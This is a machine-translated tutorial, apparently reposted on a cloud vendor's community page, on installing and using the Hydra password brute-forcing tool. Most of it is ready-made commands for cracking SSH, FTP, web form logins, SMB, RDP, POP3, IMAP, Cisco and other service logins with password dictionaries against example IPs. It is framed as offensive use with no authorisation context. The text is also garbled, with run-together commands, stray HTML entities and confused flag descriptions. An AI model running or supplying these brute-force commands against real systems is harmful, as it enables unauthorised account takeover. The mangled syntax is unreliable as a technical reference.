Hydra instructions for use--demolition artifact

Source: Internet
Author: User
Tags http post imap nntp snmp

First, Introduction 
Hydra is a well-known hacker organization THC Open-source brute force password cracking tool, can hack a variety of passwords online.
Official website: Http://www.thc.org/thc-hydra, can support AFP, Cisco AAA, Cisco Auth, Cisco Enable, CVS, Firebird, FTP, Http-form-get, http- Form-post, Http-get, Http-head, Http-proxy, Https-form-get, Https-form-post, Https-get, Https-head, HTTP-PROXY, ICQ, IMAP, IRC, LDAP, Ms-sql, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, Pc-anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, Sap/r3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, TeamSpeak (TS2), Telnet , Vmware-auth, VNC and XMPP type ciphers.

Second, installation 
hydra installing  

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz# tar zxvf  hydra-8.1.tar.gz # cd hydra-8.1 # ./configure # make &&  make install  parameter Description  hydra [[[-l LOGIN|-L FILE] [-p PASS|-P  file]] | [-c file]] [-e ns] [-o file] [-t tasks] [-m  File [-t tasks]] [-w time] [-f] [-s port] [-s] [-vv] server  service [OPT] -R  continues to crack from the last progress.  -S  Use SSL link.  -s PORT  This parameter allows you to specify a non-default port.  -l LOGIN  specify cracked users to crack for specific users.  -L FILE  specifies a dictionary of user names.  -p PASS  lowercase, specify password cracking, less use, usually using a password dictionary.  -P FILE  uppercase, specifies the password dictionary.  -e ns  Optional options, N: null password heuristic, S: Heuristic using the specified user and password.  -C FILE  use the colon split format, such as "Login: password" instead of the-l/-p parameter.  -M FILE  specify a single line of target list files.  -o FILE  Specify the result output file.  -f  inAfter using the-m parameter, the first login or password is found to abort the hack.  -t TASKS  the number of concurrently running threads, which defaults to 16.  -w TIME  set the maximum time to timeout, in seconds, and the default is 30s.  -v / -V  Show detailed procedures.  server  target ip service  Specify service name, supported services and protocols: TELNET FTP POP3[-NTLM] IMAP[-NTLM]  smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco  Cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp  socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3  ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp  AFP and so on.  OPT  options available


Iv. Examples of usages :

1. Crack ssh: hydra -l  username  -p  password dictionary  -t  threads  -vV -e ns ip  ssh hydra -l  User name  -p  password dictionary  -t  threads  -o save.log -vV ip  ssh 2, crack ftp: hydra ip ftp -l  user name  -P  password dictionary  -t  thread (default)  - vv hydra ip ftp -l  User name  -P  password dictionary  -e ns -vv 3, get method Submit, Hack Web login: hydra -l  username  -p  password dictionary  -t  threads  -vV -e ns ip  http-get /admin/ hydra -l  User name  -p  password dictionary  -t  thread  -vv -e ns &NBSP;-F&NBSP;IP&NBSP;HTTP-GET&NBSP;/ADMIN/INDEX.PHP4, post, crack Web login: hydra -l  user name  -p   Password dictionary  -s 80 ip http-post-form  "/admin/login.php:username=^user^&password=^ Pass^&submit=login:sorry password " hydra -t 3 -l admin -p pass.txt  -o out.txt -f 10.36.16.18 http-post-form  "Login.php:id=^user^&passwd=^pass^:<title>wrong  username or password</title> "  (parameter description:-T simultaneous thread count 3,-l username is admin, dictionary pass.txt, save as Out.txt,-f   When cracked a password to stop,  10.36.16.18 target ip,http-post-form means that the hack is using HTTP POST way to submit form password cracking,<title>   Is the return information hint that represents the error guess. )  5, Crack https: hydra -m /index.php -l muts -p pass.txt 10.36.16.18  https 6, crack teamspeak: hydra -l  user name  -P  password dictionary  -s  port number  -vV  Ip teamspeak 7, Crack Cisco: hydra -p pass.txt 10.36.16.18 cisco hydra  -m cloud -p pass.txt 10.36.16.18 cisco-enable 8, Crack Smb: hydra -l  administrator -p pass.txt 10.36.16.18 smb 9, Crack pop3: hydra -l  muts -p pass.txt my.pop3.mail pop3 10, Crack Rdp: hydra ip rdp -l  administrator -p pass.txt -v 11, Crack http-proxy: hydra -l admin -p pass.txt  http-proxy://10.36.16.18 12, Crack imap: hydra -l user.txt -p secret 10.36.16.18  imap plain hydra -c defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/ PLAIN


Attach the Windows version:

Https://github.com/maaaaz/thc-hydra-windows


Article reproduced in Wooyun author @ South Brother

Hydra instructions for use--demolition artifact

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.